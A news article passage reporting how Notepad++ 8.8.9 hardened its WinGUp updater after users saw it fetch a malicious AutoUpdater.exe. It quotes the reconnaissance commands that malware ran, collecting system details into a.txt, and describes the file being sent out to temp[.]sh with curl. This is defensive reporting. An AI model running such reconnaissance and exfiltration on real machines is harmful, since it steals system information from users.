Notepad++ version 8.8.9 was released to fix a security weakness in its WinGUp update tool after researchers and users reported incidents in which the updater retrieved malicious executables instead of legitimate update packages.
The first signs of this issue appeared in a Notepad++ community forum topic, where a user reported that Notepad++'s update tool, GUP.exe (WinGUp), spawned an unknown "%Temp%\AutoUpdater.exe" executable that executed commands to collect device information.
According to the reporter, this malicious executable ran various reconnaissance commands and stored the output into a file called 'a.txt.'
cmd /c netstat -ano >> a.txt cmd /c systeminfo >> a.txt cmd /c tasklist >> a.txt cmd /c whoami >> a.txt
The autoupdater.exe malware then used the curl.exe command to exfiltrate the a.txt file to temp[.]sh, a file and text-sharing website previously used in malware campaigns.
As GUP uses the libcurl library rather than the actual 'curl.exe' command and does not collect this type of information, other Notepad++ users speculated that the user had installed an unofficial, malicious version of Notepad++ or that the autoupdate network traffic was hijacked.
To help mitigate potential network hijacks, Notepad++ developer Don Ho released version 8.8.8 on November 18th, so that updates can be downloaded only from GitHub.
As a stronger fix, Notepad 8.8.9 was released on December 9th, which will prevent updates from being installed that are not signed with the developer's code-signing certificate.
"Starting with this release, Notepad++ & WinGUp have been hardened to verify the signature & certificate of downloaded installers during the update process. If verification fails, the update will be aborted." reads the Notepad 8.8.9 security notice.
Hijacked update URLs
... continue reading